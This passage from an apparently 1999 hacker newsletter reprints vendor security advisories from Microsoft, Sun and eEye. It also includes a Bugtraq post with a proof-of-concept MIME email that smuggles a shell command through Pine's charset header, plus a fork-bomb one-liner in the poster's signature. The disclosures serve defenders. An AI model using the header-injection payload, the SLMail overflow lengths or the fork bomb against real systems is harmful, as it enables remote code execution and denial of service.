> 4 for Windows NT 4.0 that could, under certain conditions, allow a user to
> log on interactively and connect to network shares using a blank password.
> The vulnerability primarily, but not exclusively, affects Windows NT servers
> that serve as domain controllers in environments with DOS, Windows 3.1,
> Windows for Workgroups, OS/2 or Macintosh clients. In general, customers who
> have deployed only Windows NT, Windows 95 and Windows 98 client workstations
> are not at risk from this vulnerability.
A fully supported patch is available for this vulnerability, and Microsoft
recommends that all customers evaluate the risk to their systems and, as
appropriate, download and install it on affected computers.
Issue
=====
The Windows NT Security Account Manager (SAM) database stores the hashed
password for each user account in two forms: an "NT hash" form that is used
to authenticate users on Windows NT clients, and an "LM hash" form that is
used to authenticate users on Windows 95, Windows 98, and downlevel clients
such as DOS, Windows 3.1, Windows for Workgroups, OS/2 and Macintosh. When a
user changes his password via a Windows NT, Windows 95 or Windows 98 client,
both the "NT hash" and "LM hash" forms of the password are updated in the
SAM. However, when the user changes his password via a downlevel client,
only the "LM hash" form of the password is stored; a null value is stored in
the "NT hash" field. This is normal operation.
When a user attempts an interactive logon or a network share connection from
a Windows NT system, the Windows NT authentication process uses the "NT
hash" form of the password. If the "NT hash" is null, the "LM hash" of the
password is used for verification. (Windows 95, Windows 98 and downlevel
clients always use only the "LM hash" for verification.) The logic error in
Service Pack 4 incorrectly allows a null "NT hash" value to be used for
authentication from Windows NT systems. The result is that if a user
account's password was last changed from a DOS, Windows 3.1, Windows for
Workgroups, OS/2 or Macintosh client, a user can logon into that account
from a Windows NT system using a blank password.
By far the most likely machines to be affected by this vulnerability would
be domain controllers running Windows NT 4.0 SP 4, in networks that contain
any of the downlevel clients listed above. However, any server or
workstation running Windows NT 4.0 SP 4 that contains a SAM database with
active users who communicate from downlevel clients would be vulnerable to
this problem. For example, a workgroup of Windows NT 4.0 SP 4 systems, one
of which is accessed by Windows for Workgroups clients, would be affected by
this vulnerability.
It is worth reiterating the following points:
- Even on an affected network, a user whose most recent
†† password change was performed via Windows NT, Windows 95
†† or Windows 98 workstations will have a non-null "NT hash"
†† value, and hence will not be at risk.
- Customers who are affected by the vulnerability need only
†† apply the patch to machines that contain SAM databases
†† with active user accounts.
- There is no need for users to update or change their passwords
†† after applying the patch. Even in vulnerable systems, the SAM
†† database entries are valid; the problem lies in the way SP4
†† processes them. The patch corrects the authentication process
†† logic in SP4 without changing the SAM database entries in any way.
Affected Software Versions
==========================
The following software versions are affected:
- Microsoft Windows NT 4.0, Service Pack 4
What Microsoft is Doing
=======================
On February 8th, Microsoft released a patch that fixes the problem
identified above. This patch is available for download from the sites listed
below.
Microsoft has sent this security bulletin to customers subscribing
to the Microsoft Product Security Notification Service (see
http://www.microsoft.com/security/services/bulletin.asp for more
information about this free customer service).
Microsoft has published the following Knowledge Base (KB) article on this
issue:
- Microsoft Knowledge Base (KB) article Q214840,
†† MSV1_0 Incorrectly Allows Network Connections for Specific Accounts
†† http://support.microsoft.com/support/kb/articles/q214/8/40.asp
†† (Note: It might take 24 hours from the original posting of this
†† bulletin for the KB article to be visible in the Web-based
†† Knowledge Base.)
Microsoft has posted the following hot fixes to address this problem.
Please note that the URLs below have been word-wrapped for readability.
- Fix for x86 version:
†† ftp://ftp.microsoft.com/bussys/winnt/winnt-public
†† /fixes/usa/NT40/hotfixes-postSP4/Msv1-fix/msv-fixi.exe
- Fix for Alpha version:
†† ftp://ftp.microsoft.com/bussys/winnt/winnt-public
†† /fixes/usa/NT40/hotfixes-postSP4/Msv1-fix/msv-fixa.exe
What Customers Should Do
========================
The patch for this vulnerability is fully supported, and Microsoft
recommends that all affected customers apply it. The URLs for the patch are
provided above in What Microsoft is Doing.
More Information
================
Please see the following references for more information related to this
issue.
- Microsoft Security Bulletin MS99-004,
†† Patch Available for Authentication Processing
†† Error in Windows NT 4.0 Service Pack 4 (the
†† Web-posted version of this bulletin),
†† http://www.microsoft.com/security/bulletins/ms99-004.asp.
- Microsoft Knowledge Base (KB) article Q214840,
†† MSV1_0 Incorrectly Allows Network Connections for
†† Specific Accounts.
†† http://support.microsoft.com/support/kb/articles/q214/8/40.asp
†† (Note: It might take 24 hours from the original posting
†† of this bulletin for the KB article to be visible in the
†† Web-based Knowledge Base.)
Acknowledgements
================
Microsoft wishes to acknowledge Harry Johnston, School of Computing and
Mathematical Sciences, University of Waikato, New Zealand, for discovering
this vulnerability and reporting it to us.
Obtaining Support on this Issue
===============================
This is a supported patch. If you have problems installing
this patch or require technical assistance with this patch,
please contact Microsoft Technical Support. For information
on contacting Microsoft Technical Support, please see
http://support.microsoft.com/support/contact/default.asp.
Revisions
=========
- February 8, 1999: Bulletin Created
For additional security-related information about Microsoft
products, please visit http://www.microsoft.com/security
-----------------------------------------------------------
THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS"
WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER
EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS
SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN
IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR
LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE
FOREGOING LIMITATION MAY NOT APPLY.
(c) 1999 Microsoft Corporation. All rights reserved. Terms of Use.
†† *******************************************************************
You have received† this e-mail bulletin as a result† of your registration
to† the†† Microsoft† Product† Security† Notification†† Service.† You† may
unsubscribe from this e-mail notification† service at any time by sending
an† e-mail† to† MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
The subject line and message body are not used in processing the request,
and can be anything you like.
For† more† information on† the† Microsoft† Security Notification† Service
please††† visit††† http://www.microsoft.com/security/bulletin.htm.††† For
security-related information† about Microsoft products, please† visit the
Microsoft Security Advisor web site at http://www.microsoft.com/security.
@HWA
5.1 Sun security advisories
~~~~~~~~~~~~~~~~~~~~~~~
{ Sorry but the excess crap has been left in these advisories to keep the
legal people happy. - Ed }
Date: Wed, 10 Feb 1999 11:24:01 -0800
From: secure@sunsc.Eng.Sun.COM (Sun Security Coordination Team)
Message-Id: <199902101924.LAA25198@sunsc.eng.sun.com>
To: CWS@sunsc.Eng.Sun.COM
X-Sun-Charset: US-ASCII
Subject: Sun Security Bulletin #00183
-----BEGIN PGP SIGNED MESSAGE-----
________________________________________________________________________________
†† Sun Microsystems, Inc. Security Bulletin
Bulletin Number: #00183
Date: February 10, 1999
Cross-Ref:
Title: sdtcm_convert
________________________________________________________________________________
The information contained in this Security Bulletin is provided "AS IS."
Sun makes no warranties of any kind whatsoever with respect to the information
contained in this Security Bulletin. ALL EXPRESS OR IMPLIED CONDITIONS,
REPRESENTATIONS AND WARRANTIES, INCLUDING ANY WARRANTY OF NON-INFRINGEMENT OR
IMPLIED WARRANTY OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, ARE
HEREBY DISCLAIMED AND EXCLUDED TO THE EXTENT ALLOWED BY APPLICABLE LAW.
IN NO EVENT WILL SUN MICROSYSTEMS, INC. BE LIABLE FOR ANY LOST REVENUE,
PROFIT OR DATA, OR FOR DIRECT, SPECIAL, INDIRECT, CONSEQUENTIAL, INCIDENTAL
OR PUNITIVE DAMAGES HOWEVER CAUSED AND REGARDLESS OF ANY THEORY OF LIABILITY
ARISING OUT OF THE USE OF OR INABILITY TO USE THE INFORMATION CONTAINED IN
THIS SECURITY BULLETIN, EVEN IF SUN MICROSYSTEMS, INC. HAS BEEN ADVISED OF
THE POSSIBILITY OF SUCH DAMAGES.
If any of the above provisions are held to be in violation of applicable law,
void, or unenforceable in any jurisdiction, then such provisions are waived
to the extent necessary for this disclaimer to be otherwise enforceable in
such jurisdiction.
________________________________________________________________________________
1.† Background
††† sdtcm_convert is a setuid-root calendar data conversion utility which
††† converts version 3 (OpenWindows) calendar data format to version 4
††† (extensible calendar data format), and vice versa. A buffer overflow
††† has been discovered which may be exploited to gain root access.†
2.† Affected Supported Versions
†††††††
††† Solaris(tm) versions:†† 7, 7_x86, 2.6, 2.6_x86, 2.5.1, 2.5.1_x86, 2.5,
††††††††††††††††††††††††††† 2.5_x86, 2.4 and 2.4_x86 running CDE
††††††††††††††††††
3.† Recommendations
††† Sun recommends that you install the respective patches immediately
††† on affected systems.
†††
††† CDE Version Patch ID†††††††
††† ___________ _________
††† 1.3†††††††††††††††† 107022-01
††† 1.3_x86†††††††††††† 107023-01
††† 1.2†††††††††††††††† 105566-06
††† 1.2_x86†††††††††††† 105567-07
††† 1.0.2†††††††††††††† 103670-06
††† 1.0.2_x86†††††††††† 103717-06
††† 1.0.1†††††††††††††† 103671-06
††† 1.0.1_x86†††††††††† 103718-06
_______________________________________________________________________________
APPENDICES
A.† Patches listed in this bulletin are available to all Sun customers via
††† World Wide Web at:
†††
††† <URL:http://sunsolve.sun.com/sunsolve/pubpatches/patches.html>
B.† Checksums for the patches listed in this bulletin are available via
††† World Wide Web at:
††† <URL:http://sunsolve.sun.com/sunsolve/pubpatches/patches.html>
C.† Sun security bulletins are available via World Wide Web at:
<URL:http://sunsolve.sun.com/sunsolve/secbulletins>
D.† Sun Security Coordination Team's PGP key is available via World Wide Web
††† at:
<URL:http://sunsolve.sun.com/sunsolve/secbulletins/SunSCkey.txt>
††† ††† †††
E.† To report or inquire about a security problem with Sun software, contact
††† one or more of the following:
†
††††††† - Your local Sun answer centers
††††††† - Your representative computer security response team, such as CERT
††††††† - Sun Security Coordination Team. Send email to:
†††† security-alert@sun.com
F.† To receive information or subscribe to our CWS (Customer Warning System)
††† mailing list, send email to:
†††
††† security-alert@sun.com
††
††† with a subject line (not body) containing one of the following commands:
††††††† Command†††††††† Information Returned/Action Taken
††††††† _______†††††††† _________________________________
††††††† help††††††††††† An explanation of how to get information
†††††††
††††††† key†††††††††††† Sun Security Coordination Team's PGP key
††††††† list††††††††††† A list of current security topics
††††††† query [topic]†† The email is treated as an inquiry and is forwarded to
††††††††††††††††††††††† the Security Coordination Team
††††††† report [topic]† The email is treated as a security report and is
††††††††††††††††††††††† forwarded to the Security Coordination Team. Please
††††††††††††††††††††††† encrypt sensitive mail using Sun Security Coordination
††††††††††††††††††††††† Team's PGP key
††††††† send topic††††† A short status summary or bulletin. For example, to
††††††††††††††††††††††† retrieve a Security Bulletin #00138, supply the
††††††††††††††††††††††† following in the subject line (not body):
†††††††
††††††††††††††††††††††††††††††† send #138
††††††† subscribe†††††† Sender is added to our mailing list.† To subscribe,
††††††††††††††††††††††† supply the following in the subject line (not body):
††††††††††††††††††††††††††† subscribe cws your-email-address
††††††††††††††††††††††† Note that your-email-address should be substituted
††††††††††††††††††††††† by your email address.
††††††† unsubscribe†††† Sender is removed from the CWS mailing list.
________________________________________________________________________________
Copyright 1999 Sun Microsystems, Inc. All rights reserved. Sun,
Sun Microsystems, Solaris and SunOS are trademarks or registered trademarks
of Sun Microsystems, Inc. in the United States and other countries. This
Security Bulletin may be reproduced and distributed, provided that this
Security Bulletin is not modified in any way and is attributed to
Sun Microsystems, Inc. and provided that such reproduction and distribution
is performed for non-commercial purposes.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBNsDNl7dzzzOFBFjJAQHCzAQAgcHETSfA5CrYudnSZues30KRififcbhB
FIKBKhAh/Tec7pa0sg9nvTjGPTcTpMPPyj2asxM9KXsxLTKILt8EuoLy3QWdc+qr
Tu0pVIcQ/PIBaUXpGMvABS1tVf13tWUIcvZ6yaj08cELV4O6X7K8dbbEXXGfLPtK
fSyVXp5ktPo=
=B8vf
-----END PGP SIGNATURE-----
Date: Wed, 10 Feb 1999 12:01:07 -0800
From: secure@sunsc.Eng.Sun.COM (Sun Security Coordination Team)
Message-Id: <199902102001.MAA25280@sunsc.eng.sun.com>
To: CWS@sunsc.Eng.Sun.COM
Subject: Sun Security Bulletin #00184
X-Sun-Charset: US-ASCII
-----BEGIN PGP SIGNED MESSAGE-----
________________________________________________________________________________
†† Sun Microsystems, Inc. Security Bulletin
Bulletin Number: #00184
Date: February 10, 1999
Cross-Ref:
Title: man/catman
________________________________________________________________________________
The information contained in this Security Bulletin is provided "AS IS."
Sun makes no warranties of any kind whatsoever with respect to the information
contained in this Security Bulletin. ALL EXPRESS OR IMPLIED CONDITIONS,
REPRESENTATIONS AND WARRANTIES, INCLUDING ANY WARRANTY OF NON-INFRINGEMENT OR
IMPLIED WARRANTY OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, ARE
HEREBY DISCLAIMED AND EXCLUDED TO THE EXTENT ALLOWED BY APPLICABLE LAW.
IN NO EVENT WILL SUN MICROSYSTEMS, INC. BE LIABLE FOR ANY LOST REVENUE,
PROFIT OR DATA, OR FOR DIRECT, SPECIAL, INDIRECT, CONSEQUENTIAL, INCIDENTAL
OR PUNITIVE DAMAGES HOWEVER CAUSED AND REGARDLESS OF ANY THEORY OF LIABILITY
ARISING OUT OF THE USE OF OR INABILITY TO USE THE INFORMATION CONTAINED IN
THIS SECURITY BULLETIN, EVEN IF SUN MICROSYSTEMS, INC. HAS BEEN ADVISED OF
THE POSSIBILITY OF SUCH DAMAGES.
If any of the above provisions are held to be in violation of applicable law,
void, or unenforceable in any jurisdiction, then such provisions are waived
to the extent necessary for this disclaimer to be otherwise enforceable in
such jurisdiction.
________________________________________________________________________________
1.† Background
††† The man command displays information from the reference manuals. The
††† catman utility creates preformatted versions of the on-line manuals.
††† Vulnerabilities have been discovered with these commands that may be
††† exploited to overwrite arbitrary files when man or catman is executed
††† by root.
†††
2.† Affected Supported Versions
†††††††
††† Solaris(tm) versions:†† 7, 7_x86, 2.6, 2.6_x86, 2.5.1, 2.5.1_x86, 2.5,
††††††††††††††††††††††††††† 2.5_x86, 2.4, 2.4_x86, and 2.3
†††††††††††††††††††††††††††
††† SunOS(tm) versions:†††† 4.1.4 and 4.1.3_U1
††††††††††††††††††
3.† Recommendations
††† Sun recommends that you install the respective patches immediately
††† on affected systems.
†††
††† Operating System Patch ID
††† _________________†† _________†††
††† Solaris 7†††††††††† 107038-01
††† Solaris 7_x86†††††† 107039-01
††† Solaris 2.6†††††††† 106123-04
††† Solaris 2.6_x86†††† 106124-04
††† Solaris 2.5.1†††††† 106905-01
††† Solaris 2.5.1_x86†† 106906-01
††† Solaris 2.5†††††††† 106907-01
††† Solaris 2.5_x86†††† 106908-01
††† Solaris 2.4†††††††† 106912-01
††† Solaris 2.4_x86†††† 106962-01
††† Solaris 2.3†††††††† 106911-01
††† SunOS†† 4.1.4 107157-01
††††††††††††††††††††††† 107144-01
††† SunOS†† 4.1.3_U1 107156-01
††††††††††††††††††††††† 107143-01
†††††††††††††††††††††††
_______________________________________________________________________________
APPENDICES
A.† Patches listed in this bulletin are available to all Sun customers via
††† World Wide Web at:
†††
††† <URL:http://sunsolve.sun.com/sunsolve/pubpatches/patches.html>
B.† Checksums for the patches listed in this bulletin are available via
††† World Wide Web at:
††† <URL:http://sunsolve.sun.com/sunsolve/pubpatches/patches.html>
C.† Sun security bulletins are available via World Wide Web at:
<URL:http://sunsolve.sun.com/sunsolve/secbulletins>
D.† Sun Security Coordination Team's PGP key is available via World Wide Web
††† at:
<URL:http://sunsolve.sun.com/sunsolve/secbulletins/SunSCkey.txt>
††† ††† †††
E.† To report or inquire about a security problem with Sun software, contact
††† one or more of the following:
†
††††††† - Your local Sun answer centers
††††††† - Your representative computer security response team, such as CERT
††††††† - Sun Security Coordination Team. Send email to:
†††† security-alert@sun.com
F.† To receive information or subscribe to our CWS (Customer Warning System)
††† mailing list, send email to:
†††
††† security-alert@sun.com
††
††† with a subject line (not body) containing one of the following commands:
††††††† Command†††††††† Information Returned/Action Taken
††††††† _______†††††††† _________________________________
††††††† help††††††††††† An explanation of how to get information
†††††††
††††††† key†††††††††††† Sun Security Coordination Team's PGP key
††††††† list††††††††††† A list of current security topics
††††††† query [topic]†† The email is treated as an inquiry and is forwarded to
††††††††††††††††††††††† the Security Coordination Team
††††††† report [topic]† The email is treated as a security report and is
††††††††††††††††††††††† forwarded to the Security Coordination Team. Please
††††††††††††††††††††††† encrypt sensitive mail using Sun Security Coordination
††††††††††††††††††††††† Team's PGP key
††††††† send topic††††† A short status summary or bulletin. For example, to
††††††††††††††††††††††† retrieve a Security Bulletin #00138, supply the
††††††††††††††††††††††† following in the subject line (not body):
†††††††
††††††††††††††††††††††††††††††† send #138
††††††† subscribe†††††† Sender is added to our mailing list.† To subscribe,
††††††††††††††††††††††† supply the following in the subject line (not body):
††††††††††††††††††††††††††† subscribe cws your-email-address
††††††††††††††††††††††† Note that your-email-address should be substituted
††††††††††††††††††††††† by your email address.
††††††† unsubscribe†††† Sender is removed from the CWS mailing list.
________________________________________________________________________________
Copyright 1999 Sun Microsystems, Inc. All rights reserved. Sun,
Sun Microsystems, Solaris and SunOS are trademarks or registered trademarks
of Sun Microsystems, Inc. in the United States and other countries. This
Security Bulletin may be reproduced and distributed, provided that this
Security Bulletin is not modified in any way and is attributed to
Sun Microsystems, Inc. and provided that such reproduction and distribution
is performed for non-commercial purposes.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBNsDNq7dzzzOFBFjJAQEW2AQAhwzM5IgjrTmjzxu9NbheZ8cGH2xtiLId
At89187MXvjXuTw44HUiulBQtJoKYdhf9yiU+n0BtUAUpRsXMtu/mtOkwajMAzRi
lZ+Js93s1x3o6GY8qy+jbl4m7zLLrzRx6V+T+DwjWFVZ5RfW+57MEgEx3kTgCEzt
c+KlX2EGnP0=
=XsT5
-----END PGP SIGNATURE-----
Date: Wed, 10 Feb 1999 12:01:34 -0800
From: secure@sunsc.Eng.Sun.COM (Sun Security Coordination Team)
Message-Id: <199902102001.MAA25297@sunsc.eng.sun.com>
To: CWS@sunsc.Eng.Sun.COM
Subject: Sun Security Bulletin #00185
X-Sun-Charset: US-ASCII
-----BEGIN PGP SIGNED MESSAGE-----
________________________________________________________________________________
†† Sun Microsystems, Inc. Security Bulletin
Bulletin Number: #00185
Date: February 10, 1999
Cross-Ref: CERT CA-98.02
Title: Common Desktop Environment (CDE)
________________________________________________________________________________
The information contained in this Security Bulletin is provided "AS IS."
Sun makes no warranties of any kind whatsoever with respect to the information
contained in this Security Bulletin. ALL EXPRESS OR IMPLIED CONDITIONS,
REPRESENTATIONS AND WARRANTIES, INCLUDING ANY WARRANTY OF NON-INFRINGEMENT OR
IMPLIED WARRANTY OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, ARE
HEREBY DISCLAIMED AND EXCLUDED TO THE EXTENT ALLOWED BY APPLICABLE LAW.
IN NO EVENT WILL SUN MICROSYSTEMS, INC. BE LIABLE FOR ANY LOST REVENUE,
PROFIT OR DATA, OR FOR DIRECT, SPECIAL, INDIRECT, CONSEQUENTIAL, INCIDENTAL
OR PUNITIVE DAMAGES HOWEVER CAUSED AND REGARDLESS OF ANY THEORY OF LIABILITY
ARISING OUT OF THE USE OF OR INABILITY TO USE THE INFORMATION CONTAINED IN
THIS SECURITY BULLETIN, EVEN IF SUN MICROSYSTEMS, INC. HAS BEEN ADVISED OF
THE POSSIBILITY OF SUCH DAMAGES.
If any of the above provisions are held to be in violation of applicable law,
void, or unenforceable in any jurisdiction, then such provisions are waived
to the extent necessary for this disclaimer to be otherwise enforceable in
such jurisdiction.
________________________________________________________________________________
1.† Background
††† Several vulnerabilities in the Common Desktop Environment (CDE) may be
††† be exploited to gain root access and remove arbitrary files.
2.† Affected Supported Versions
†††††††
††† Solaris(tm) versions:†† 2.6, 2.6_x86, 2.5.1, 2.5.1_x86, 2.5,
††††††††††††††††††††††††††† 2.5_x86, 2.4 and 2.4_x86 running CDE
†††††††††††††††††††††††††††
††† Solaris 7 is not affected.†††††††††††††
††††††††††††††††††
3.† Recommendations
††† Sun recommends that you install the respective patches immediately
††† on affected systems.
†††
††† CDE Version†††††††† Patch ID†††††††
††† ___________†††††††† _________
††† 1.2 106112-03
††† 105837-02
††† 1.2_x86 106113-03
††† ††† 105838-02
††† 1.0.2 104661-07
††† 104498-05
††† 103882-09
††† 1.0.2_x86 104663-08
††††† 104500-05
††††† 103886-08
††† 1.0.1 104660-04
††† 104497-05
††† 103884-07
††† 1.0.1_x86 104662-05
††† 104499-05
††† 103885-07
†††††
_______________________________________________________________________________
APPENDICES
A.† Patches listed in this bulletin are available to all Sun customers via
††† World Wide Web at:
†††
††† <URL:http://sunsolve.sun.com/sunsolve/pubpatches/patches.html>
B.† Checksums for the patches listed in this bulletin are available via
††† World Wide Web at:
††† <URL:http://sunsolve.sun.com/sunsolve/pubpatches/patches.html>
C.† Sun security bulletins are available via World Wide Web at:
<URL:http://sunsolve.sun.com/sunsolve/secbulletins>
D.† Sun Security Coordination Team's PGP key is available via World Wide Web
††† at:
<URL:http://sunsolve.sun.com/sunsolve/secbulletins/SunSCkey.txt>
††† ††† †††
E.† To report or inquire about a security problem with Sun software, contact
††† one or more of the following:
†
††††††† - Your local Sun answer centers
††††††† - Your representative computer security response team, such as CERT
††††††† - Sun Security Coordination Team. Send email to:
†††† security-alert@sun.com
F.† To receive information or subscribe to our CWS (Customer Warning System)
††† mailing list, send email to:
†††
††† security-alert@sun.com
††
††† with a subject line (not body) containing one of the following commands:
††††††† Command†††††††† Information Returned/Action Taken
††††††† _______†††††††† _________________________________
††††††† help††††††††††† An explanation of how to get information
†††††††
††††††† key†††††††††††† Sun Security Coordination Team's PGP key
††††††† list††††††††††† A list of current security topics
††††††† query [topic]†† The email is treated as an inquiry and is forwarded to
††††††††††††††††††††††† the Security Coordination Team
††††††† report [topic]† The email is treated as a security report and is
††††††††††††††††††††††† forwarded to the Security Coordination Team. Please
††††††††††††††††††††††† encrypt sensitive mail using Sun Security Coordination
††††††††††††††††††††††† Team's PGP key
††††††† send topic††††† A short status summary or bulletin. For example, to
††††††††††††††††††††††† retrieve a Security Bulletin #00138, supply the
††††††††††††††††††††††† following in the subject line (not body):
†††††††
††††††††††††††††††††††††††††††† send #138
††††††† subscribe†††††† Sender is added to our mailing list.† To subscribe,
††††††††††††††††††††††† supply the following in the subject line (not body):
††††††††††††††††††††††††††† subscribe cws your-email-address
††††††††††††††††††††††† Note that your-email-address should be substituted
††††††††††††††††††††††† by your email address.
††††††† unsubscribe†††† Sender is removed from the CWS mailing list.
________________________________________________________________________________
Copyright 1999 Sun Microsystems, Inc. All rights reserved. Sun,
Sun Microsystems, Solaris and SunOS are trademarks or registered trademarks
of Sun Microsystems, Inc. in the United States and other countries. This
Security Bulletin may be reproduced and distributed, provided that this
Security Bulletin is not modified in any way and is attributed to
Sun Microsystems, Inc. and provided that such reproduction and distribution
is performed for non-commercial purposes.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBNsDNu7dzzzOFBFjJAQGpVgQApC+yMuvC1Nr7GprSaZl0mzMUQjz1iOba
AzDYjksWY5iL+k/aDMuItJ9v/0TGSU7uQkxx64klQjqSmLRD3WZX51c4s9+VppFa
V/Y4cf8h2woEenQM8wVwrg2S0rbOTFllnwB3UhT8LkhTC4Qeno8W8TEVTpQOwvhg
lhPafl3ka/8=
=Ub3k
-----END PGP SIGNATURE-----
5.2 eEYe security advisories - Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
________________________________________________________________________
eEye Digital Security Team <e>
www.eEye.com
info@eEye.com
February 04, 1999
________________________________________________________________________
Multiple SLMail Vulnerabilities
Systems Affected
SLMail 3.1
Release Date
February 04, 1999
Advisory Code
AD02041999
________________________________________________________________________
Description:
________________________________________________________________________
We were once again grinding software through Retina Alpha code and have
found the following.
One of the ports that SLMail's POP Service listens on is port 27. It
provides ESMTP functionality. The only difference between it and SLMail's
SMTP service is that port 27 provides the "turn" functions. All
vulnerabilities are based off of the port 27 service.
The first vulnerability involves the "helo" command. There are two
vulnerabilities within it. The first is sending "helo" followed by 819 to
849 characters. This will send the servers CPU to idle around 90%.
The second vulnerability in the "helo" command is a buffer overflow. If you
issue "helo" followed by 855 to 2041 characters the server will crash with
your typical overflow error.
The second set of vulnerabilities are with the "vrfy" and "expn" commands.
We have not tested to find the start and stop string lengths but sending
"vrfy" or "expn" with 2041 characters will cause the SLMail.exe to exit
itself.
So we can either send the CPU to 90%, overflow some buffers, or have the
server exit without a trace. Take your pick.
________________________________________________________________________
Vendor Status
________________________________________________________________________
We gave SeattleLabs a week. We have no reply so far. Contact them directly
and maybe they will respond.
________________________________________________________________________
Copyright (c) 1999 eEye Digital Security Team
________________________________________________________________________
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent of
eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail alert@eEye.com for
permission.
________________________________________________________________________
Disclaimer:
________________________________________________________________________
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.
Please send suggestions, updates, and comments to:
eEye Digital Security Team
info@eEye.com
http://www.eEye.com
Vendor response:
Approved-By: Russ.Cooper@RC.ON.CA
Date: Thu, 4 Feb 1999 23:58:24 GMT
Reply-To: lt@seattlelab.com
Sender: Windows NT BugTraq Mailing List <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>
From: Lee Thompson <lt@seattlelab.com>
Subject: Multiple SLMail Vulnerabilities
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
We are working on a fix and will be including it in our SLmail 3.2 maintenance
release.
_
Lee Thompson†††††††††††††††††††††† lt@seattlelab.com
Seattle Lab Inc.†††††††††† http://www.seattlelab.com
Product Manager
@HWA
6.0 Arbitrary command execution in Pine in latest release
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Mon, 8 Feb 1999 00:22:17 +0100
From: Michal Zalewski <lcamtuf@IDS.PL>
To: BUGTRAQ@netspace.org
Subject: remote exploit on pine 4.10 - neverending story?
Affected systems:
-----------------
Any Un*x system running 'pine' up to version 4.10 (latest).
Compromise:
-----------
Remote execution of arbitrary code when message is viewed.
Details:
--------
About five months ago, I reported vunerability in metamail package used
with pine. I also noticed that '`' character is incorrectly expanded by
pine. Problem has been ignored (probably noone understood what I am
talking about?;-). But no matter. An exception from /etc/mailcap:
text/plain; shownonascii iso-8859-1 %s; test=test "`echo %{charset} | tr
'[A-Z]' '[a-z]'`" = iso-8859-1; copiousoutput
Impact:
-------
And now, ladies and gentelmen - my old bug, reinvented. Usually, above
mailcap line is expanded to:
[...] execve </bin/sh> (sh) (-c) (test "`echo 'US-ASCII' | tr '[A-Z]'
'[a-z]'`" = iso-8859-1)
Hmm, but take a look at this message:
************************** MIME MESSAGE FOLLOWS **************************
>From: Attacker <attacker@eleet.net>
To: Victim <victim@somewhere.net>
Subject: Happy birthday
...
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-235065145-918425607=:319"
--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset='US-ASCII'
Make a wish...
--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset=``touch${IFS}ME``; name="logexec.c"
Content-Transfer-Encoding: BASE64
Content-Description: wish
Content-Disposition: attachment; filename="wish.c"
...it could be your last.
*************************** MIME MESSAGE ENDS ***************************
The result is:
[...] execve </bin/sh> (sh) (-c) (test "`echo '``touch${IFS}ME``' | tr
'[A-Z]' '[a-z]'`" = iso-8859-1)
...and arbitrary code ('touch ME', encoded using ${IFS} trick) is
executed when message is viewed.
Fix:
----
Well, it's the second time I report problems with ` in headers.
Maybe pine developers should wait a little longer ;-)
_______________________________________________________________________
Michal Zalewski [lcamtuf@ids.pl] [ENSI / marchew] [dione.ids.pl SYSADM]
[lunete.nfi.pl SYSADM] [http://dione.ids.pl/lcamtuf] bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
7.0 Hacking in Germany by Qubik
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Hacking in Germany.
©1999 HWA/Qubik
Though visiting Germany is a very common thing for myself, the trip
I took last month was the first where I've actually looked into the
Germany hacker scene..
The German press seem to support so much of the hacker ethic, the
magazines and newspapers are full of interesting interviews, updates
and facts. Rather than trying to cover up the fact that hacker exist,
like so many others do, they embrace the fact and try to teach the
country of what they do and why they do it. Take for example, CHIP,
it's a computer magazine full of interesting news, not just pages and
pages of adverts! One of the articles compares the new generation of
hackers, against what is seen in films. It's full of information on
the CCC, Karl Koch and an interesting interview with Christoph Fischer,
who doesn't seem like an idiot reading a script..!
This all leads to a strange, yet pleasing, affect, whereby both the
hacker and your average Joe, get along without much tension, and from
the impression I got from my associates, hackers in Germany are widely
respected.
But even in the heaven of Germany, hackerdom is looked down on upon by
many, but at least there's a distinction between the good and bad hackers.
Who knows, maybe one day I'll move to Germany and live in reasonable peace..
Links: http://www.chip.de/
http://www.ccc.de/
Have your say: qubik@bikkel.com
cc: hwa@press.usmc.net
8.0 Spotlight on: Project Gamma
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Underground Sites - Project Gamma
©1999 HWA/Qubik
In the first of a continuing series of reviews, I take a look into a
group called Project Gamma. Who are they? What do they do? And why do
